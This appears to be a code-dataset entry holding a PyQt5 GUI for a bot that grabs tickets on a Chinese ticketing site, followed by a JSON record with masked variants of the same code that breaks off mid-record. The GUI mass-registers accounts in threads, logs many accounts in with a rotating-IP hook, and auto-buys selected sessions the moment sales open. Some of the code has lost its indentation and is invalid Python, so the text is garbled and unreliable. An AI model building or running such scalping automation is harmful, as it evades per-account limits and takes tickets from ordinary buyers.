def wait_sale(self):
dateList = ex.saleTime
print("%s年%s月%s日%s时开始售票,等待购买!" % tuple(dateList))
self.textBrowser_1.append("%s年%s月%s日%s时开始售票,等待购买!" % tuple(dateList))
while True:
saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) + '0000', "%Y%m%d%H%M%S")))
if saleTimestamp <= int(time.time()):
print("%s年%s月%s日%s时开始售票,开始购买!" % tuple(dateList))
self.textBrowser_1.append("%s年%s月%s日%s时开始售票,开始购买!" % tuple(dateList))
break
time.sleep(1)
my_attr['gross'] = self.lineEdit_1.text()
my_attr['selNum'] = self.lineEdit_8.text()
my_attr['selPrice'] = ex.eventPrice
my_attr['selSeatUrl'] = ex.eventUrl
self.textBrowser_1.append("开始购买,请您耐心等待...")
#点击注册执行并打印注册
def register(self):
self.textBrowser_3.append("开始注册,请等待...")
try:
regiterSum = int(self.lineEdit_tab3.text())
except Exception as err:
res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok) # 提示框
return
threads = []
for _ in range(regiterSum):
uper = Register()
Thread_name = Thread(target=uper.registerInfo)
Thread_name.setDaemon(True)
Thread_name.start()
threads.append(Thread_name)
# 退出程序
def exit_quit(self):
global EXIT_COND
res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.Yes | QMessageBox.No) # 提示框
if res == QMessageBox.Yes:
self._thread.exit_thread()
time.sleep(1)
sys.exit()
else:
pass
class Example(QMainWindow):
    """Selection window: shows the queried sessions and prices as check
    boxes so the user can tick what to buy, then publishes the choices
    back to the main window.

    NOTE(review): these are mutable *class* attributes shared by every
    instance. The program only ever creates one instance (``ex``), so
    this works, but per-instance state would normally be set in __init__.
    """
    sessionList = []     # session display names from the last query
    priceList = []       # price texts from the last query
    sessionListEvn = []  # QCheckBox widgets created for sessions
    priceListEvn = []    # QCheckBox widgets created for prices
    eventDateList = []   # raw query results (list of dicts) from request_spider
    eventUrl = []        # URLs of the sessions the user ticked
    eventPrice = []      # price-list indices (as str) the user ticked
    sessionName = []     # names of the sessions the user ticked
    sessionPrice = []    # texts of the prices the user ticked
    saleTime = []        # optional sale start parts; consumed by wait_sale
    buyNum = 1
    def __init__(self):
        """Build the fixed-size selection window with a scrollable area."""
        # NOTE(review): super(QMainWindow, self) starts the MRO lookup
        # *after* QMainWindow, skipping QMainWindow.__init__; usually
        # written super(Example, self) — confirm this is intended.
        super(QMainWindow, self).__init__()
        self.setWindowTitle('城市售票网') # window title
        self.resize(680, 800)
        # Minimize button only (no maximize).
        self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
        # Lock the window at its current size.
        self.setFixedSize(self.width(), self.height())
        self.w = QWidget()
        self.w.setFixedWidth(680)
        self.w.setFixedHeight(540)
        self.setCentralWidget(self.w)
        self.topFiller = QWidget()
        # Put the layout into window w:
        # create a scroll area...
        self.scroll = QScrollArea()
        self.scroll.setWidget(self.topFiller) # ...hosting self.topFiller
        self.vbox = QVBoxLayout() # box layout
        self.vbox.addWidget(self.scroll) # scroll area goes into the layout
        self.w.setLayout(self.vbox)
        self.initUI()
    def closeEvent(self, QCloseEvent):
        """Confirm before closing; on Yes, flag the choices as ready
        (SHOW_S_P) and reset the select-all boxes, else keep the window.

        NOTE(review): the parameter shadows the QCloseEvent class name.
        """
        res = QMessageBox.question(self,'提示','您确定选择无误吗?',QMessageBox.Yes|QMessageBox.No,QMessageBox.No) # Yes/No buttons, No is the default
        if res == QMessageBox.Yes:
            global SHOW_S_P
            SHOW_S_P = True
            QCloseEvent.accept()
            self.cb1.setChecked(False)
            self.cb2.setChecked(False)
        else:
            QCloseEvent.ignore()
    def initUI(self):
        """Create the two select-all check boxes and the OK/refresh
        buttons, and wire their signals to the slot methods."""
        # Select-all check boxes: cb1 for sessions, cb2 for prices.
        self.cb1 = QCheckBox('全选',self.topFiller)
        self.cb1.move(20,30)
        self.cb2 = QCheckBox('全选',self)
        self.cb2.move(20, 570)
        # Action buttons.
        bt1 = QPushButton('确定',self)
        bt2 = QPushButton('刷新',self)
        bt1.move(20,760)
        bt2.move(120,760)
        # stateChanged fires whenever the user checks or unchecks a box,
        # so connect it to the corresponding select-all slot.
        self.cb1.stateChanged.connect(self.changecb1) # session select-all slot
        self.cb2.stateChanged.connect(self.changecb2) # price select-all slot
        bt1.clicked.connect(self.pitch_on) # confirm the ticked choices
        bt2.clicked.connect(self.create_c) # (re)build the check boxes
    def create_c(self):
        """(Re)build the session and price check boxes from the latest
        query results and show the window; warn if there are none."""
        if self.eventDateList:
            self.sessionList = [eventDateName['eventDateName'] for eventDateName in self.eventDateList]
            # NOTE(review): prices are taken from the first event only —
            # assumes every session shares one price list; confirm.
            self.priceList = [price for price in self.eventDateList[0]['priceList']]
            # print(self.priceList)
            # print(self.sessionList)
            ex.show()
        else:
            ex.show()
            QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)
            return
        # Clear widgets and picks left over from the previous search.
        if self.sessionListEvn and self.priceListEvn:
            for s_evn in self.sessionListEvn:
                s_evn.deleteLater()
            for p_evn in self.priceListEvn:
                p_evn.deleteLater()
            self.sessionListEvn.clear()
            self.priceListEvn.clear()
            self.eventPrice.clear()
            self.eventUrl.clear()
        # One check box per session, stacked vertically in the scroll area.
        for i,item in enumerate(self.sessionList):
            cb = QCheckBox(item, self.topFiller)
            cb.move(30, 60+30*i)
            self.sessionListEvn.append(cb)
            cb.show()
        self.topFiller.setMinimumSize(580,(len(self.sessionList)+5)*30) # size the scrollable area to fit
        # One check box per price, laid out in two columns.
        for i,item in enumerate(self.priceList):
            cb_1 = QCheckBox(str(item), self)
            if i % 2 == 0:
                i = i // 2 + 1
                cb_1.move(30, 570+30*i)
            else:
                i = i // 2 + 1
                cb_1.move(330, 570+30*i)
            self.priceListEvn.append(cb_1)
            cb_1.show()
    def pitch_on(self):
        """OK handler: collect the ticked sessions and prices into the
        class lists, then close the window if anything was chosen."""
        if self.sessionList:
            for i in self.sessionListEvn: # walk every session check box
                if i.isChecked(): # only ticked ones
                    for eventDate in self.eventDateList: # find the matching query record
                        if eventDate['eventDateName'] == i.text(): # match by display name
                            if 'saleDate' in eventDate:
                                # Remember the sale start for wait_sale.
                                self.saleTime = eventDate['saleDate']
                                # print(eventDate['saleDate'])
                            self.eventUrl.append(eventDate["eventUrl"]) # keep the ticked session's URL
                            self.sessionName.append(eventDate['eventDateName'])
            for i in self.priceListEvn:
                if i.isChecked():
                    if i.text() in self.eventDateList[0]['priceList']:
                        # Store the price's index (as str) and its text.
                        self.eventPrice.append(str(self.eventDateList[0]['priceList'].index(i.text())))
                        self.sessionPrice.append(i.text())
            # Something chosen: close the window; otherwise ask first.
            if self.eventPrice and self.eventUrl:
                self.close()
            else:
                res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?', QMessageBox.Yes | QMessageBox.No,
                                           QMessageBox.No) # Yes/No buttons, No is the default
                if res == QMessageBox.Yes:
                    self.close()
        else:
            print("输入内容不存在!")
    # Select-all slot for the session check boxes.
    def changecb1(self):
        """Mirror cb1's checked state onto every session check box."""
        if self.cb1.checkState() == Qt.Checked:
            for qcb in self.sessionListEvn:
                qcb.setChecked(True)
        elif self.cb1.checkState() == Qt.Unchecked:
            for qcb in self.sessionListEvn:
                qcb.setChecked(False)
    # Select-all slot for the price check boxes.
    def changecb2(self):
        """Mirror cb2's checked state onto every price check box."""
        if self.cb2.checkState() == Qt.Checked:
            for qcb in self.priceListEvn:
                qcb.setChecked(True)
        elif self.cb2.checkState() == Qt.Unchecked:
            for qcb in self.priceListEvn:
                qcb.setChecked(False)
    # Refresh helper: wait until query data exists, then build once.
    def refresh_cb(self):
        """Poll until session/price data is available, then build the
        check boxes exactly once."""
        while True:
            if self.sessionList and self.priceList:
                self.create_c()
                break
            time.sleep(0.2)
if __name__ == '__main__':
    app = QtWidgets.QApplication(sys.argv)  # the QApplication driving the whole program
    ex = Example()  # session/price selector window; module-level global used by Ui_MainWindow
    MainWindow = QtWidgets.QMainWindow()  # top-level window that hosts all widgets
    ui = Ui_MainWindow()  # instance of the generated/hand-written UI class
    ui.setupUi(MainWindow)  # build the widget tree onto the QMainWindow
    MainWindow.show()  # display the main window
    # ex.show()  # selector window is shown later, on demand (see create_c)
    sys.exit(app.exec_())  # enter the Qt event loop; propagate its exit code
|
normal
|
{
"blob_id": "bc0846397a5ad73b1c4b85e12864b27ef4fd08d7",
"index": 5358,
"step-1": "<mask token>\n\n\nclass Ui_MainWindow(QMainWindow):\n threads = []\n keywordJudge = ''\n\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status, self\n .output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName('MainWindow')\n MainWindow.resize(640, 478)\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.setFixedSize(self.width(), self.height())\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName('centralwidget')\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName('tabWidget')\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName('tab')\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton.setObjectName('pushButton')\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(' 请输入登陆个数')\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_0.setObjectName('label_0')\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName('textBrowser_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName('tab_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName('tab_3')\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n 
self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName('lineEdit')\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName('pushButton_2')\n self.pushButton_2.clicked.connect(self.search_1)\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName('label')\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName('label_2')\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n self.comboBox.setObjectName('comboBox')\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName('comboBox_2')\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName('label_3')\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n self.lineEdit_1.setObjectName('lineEdit_1')\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n self.label_6.setObjectName('label_6')\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName('label_7')\n self.label_7.setStyleSheet('font-size:16px;color:red')\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName('label_8')\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n self.lineEdit_8.setObjectName('lineEdit_8')\n self.lineEdit_8.setText('4')\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 
160, 54, 31))\n self.pushButton_3.setObjectName('pushButton_3')\n self.pushButton_3.clicked.connect(self.search_2)\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName('pushButton_quit')\n self.pushButton_quit.clicked.connect(self.exit_quit)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName('label_4')\n self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName('textBrowser')\n self.tabWidget.addTab(self.tab_2, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.tabWidget.addTab(self.tab_3, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName('pushButton')\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(' 请输入注册个数')\n self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName('textBrowser_3')\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName('label_5')\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate('MainWindow', '城市售票网-抢票'))\n self.pushButton.setText(_translate('MainWindow', '点击登录'))\n 
self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab),\n _translate('MainWindow', '账号登录'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2),\n _translate('MainWindow', '抢购中心'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3),\n _translate('MainWindow', '账号注册'))\n self.label_0.setText(_translate('MainWindow', '登录日志:'))\n self.pushButton_2.setText(_translate('MainWindow', '搜索名称'))\n self.pushButton_3.setText(_translate('MainWindow', '点击购买'))\n self.pushButton_quit.setText(_translate('MainWindow', '退出程序'))\n self.pushButton_4.setText(_translate('MainWindow', '点击注册'))\n self.label.setText(_translate('MainWindow', '已择场次:'))\n self.label_2.setText(_translate('MainWindow', '已择价格:'))\n self.label_3.setText(_translate('MainWindow', '购买总数量:'))\n self.label_4.setText(_translate('MainWindow', '购买日志:'))\n self.label_5.setText(_translate('MainWindow', '注册日志:'))\n self.label_6.setText(_translate('MainWindow', '已购买:'))\n self.label_7.setText(_translate('MainWindow', '0'))\n self.label_8.setText(_translate('MainWindow', '每个账号购买数量:'))\n self.textBrowser_3.setText('')\n self.textBrowser_2.setText('')\n self.textBrowser_1.setText('')\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n ipList = ['']\n self.textBrowser_2.append('开始登陆,请等待...')\n userinfo_list = []\n with open('infomation.txt', 'rt', encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, args=(thr, ip))\n self.threads.append(Thread_name)\n 
Thread_name.setDaemon(True)\n Thread_name.start()\n\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append('正在查询 %s 的所有场次和价格...' % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append('请等待...')\n self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i, eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i, price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append('查询成功,请在选择界面选择场次和价格...')\n global SESSION_DATA\n SESSION_DATA = True\n else:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n print(err)\n sys.exit()\n\n def output_login_status(self):\n while True:\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.\n textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for record in buy_record_list:\n if '购买成功' in record:\n 
self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.\n textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.\n textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append('请输入购买总数量...')\n return\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append('正在购买,请等待...')\n return\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def wait_sale(self):\n dateList = ex.saleTime\n print('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) +\n '0000', '%Y%m%d%H%M%S')))\n if saleTimestamp <= int(time.time()):\n print('%s年%s月%s日%s时开始售票,开始购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,开始购买!' 
% tuple(\n dateList))\n break\n time.sleep(1)\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def register(self):\n self.textBrowser_3.append('开始注册,请等待...')\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.\n Yes | QMessageBox.No)\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网')\n self.resize(680, 800)\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n self.setFixedSize(self.width(), self.height())\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller)\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.scroll)\n self.w.setLayout(self.vbox)\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self, '提示', '您确定选择无误吗?', QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n 
QCloseEvent.ignore()\n\n def initUI(self):\n self.cb1 = QCheckBox('全选', self.topFiller)\n self.cb1.move(20, 30)\n self.cb2 = QCheckBox('全选', self)\n self.cb2.move(20, 570)\n bt1 = QPushButton('确定', self)\n bt2 = QPushButton('刷新', self)\n bt1.move(20, 760)\n bt2.move(120, 760)\n self.cb1.stateChanged.connect(self.changecb1)\n self.cb2.stateChanged.connect(self.changecb2)\n bt1.clicked.connect(self.pitch_on)\n bt2.clicked.connect(self.create_c)\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for\n eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0][\n 'priceList']]\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n for i, item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60 + 30 * i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580, (len(self.sessionList) + 5) * 30)\n for i, item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570 + 30 * i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570 + 30 * i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn:\n if i.isChecked():\n for eventDate in self.eventDateList:\n if eventDate['eventDateName'] == i.text():\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n self.eventUrl.append(eventDate['eventUrl'])\n self.sessionName.append(eventDate['eventDateName'])\n for i in self.priceListEvn:\n if i.isChecked():\n if i.text() in self.eventDateList[0]['priceList']:\n 
self.eventPrice.append(str(self.eventDateList[0][\n 'priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n self.close()\n else:\n print('输入内容不存在!')\n\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Worker(QThread):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Ui_MainWindow(QMainWindow):\n threads = []\n keywordJudge = ''\n\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status, self\n .output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName('MainWindow')\n MainWindow.resize(640, 478)\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.setFixedSize(self.width(), self.height())\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName('centralwidget')\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName('tabWidget')\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName('tab')\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton.setObjectName('pushButton')\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(' 请输入登陆个数')\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_0.setObjectName('label_0')\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName('textBrowser_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName('tab_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_3 = QtWidgets.QWidget()\n 
self.tab_3.setObjectName('tab_3')\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName('lineEdit')\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName('pushButton_2')\n self.pushButton_2.clicked.connect(self.search_1)\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName('label')\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName('label_2')\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n self.comboBox.setObjectName('comboBox')\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName('comboBox_2')\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName('label_3')\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n self.lineEdit_1.setObjectName('lineEdit_1')\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n self.label_6.setObjectName('label_6')\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName('label_7')\n self.label_7.setStyleSheet('font-size:16px;color:red')\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName('label_8')\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n 